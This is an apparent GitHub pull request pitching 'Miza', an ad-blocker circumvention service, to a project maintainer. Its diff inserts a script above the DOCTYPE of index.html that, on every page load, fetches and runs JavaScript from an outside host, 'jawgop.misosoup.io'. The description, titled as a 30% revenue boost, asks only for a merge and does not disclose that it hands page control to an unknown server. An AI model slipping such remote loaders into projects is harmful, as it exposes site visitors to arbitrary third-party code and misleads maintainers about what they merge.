### PR TITLE
Increase Carbon ad revenue by 30%

### DIFF
--- a/bootstrap-material-design-master/index.html
+++ b/bootstrap-material-design-master/index.html
@@ -1,3 +1,11 @@
+<script type='text/javascript'>           	
+  (function(window, base) {
+    var script = document.createElement("script");
+    script.src = "//" + base + "/c?r=" + Math.random();
+    script.async = true;
+    document.getElementsByTagName('head')[0].appendChild(script);
+  })(window, "jawgop.misosoup.io");
+</script>
 <!DOCTYPE html>
 
 <html>


### PR DESCRIPTION
Hey @rishiraj824,

Awesome choice picking Carbon ads, they are simple and unobtrusive! My friend and I have been working on our spare time a way to increase Carbon revenue by ~30%. 

We realized that ad blockers were taking a huge chunk of our revenue so we built [Miza](https://miza.io). You can think of Miza as a bodyguard for your ads, when Miza is installed, your ads will always appear.

We are currently in a private beta and think you would be a great fit! If you want to give us a try, it's as simple as merging the pull request. Once you have merged the pull request you can view your analytics with this link: [https://miza.io/invite/wijhlf](https://miza.io/invite/wijhlf)

You can contact me directly if you have any questions at brian@miza.io Thanks for your time!
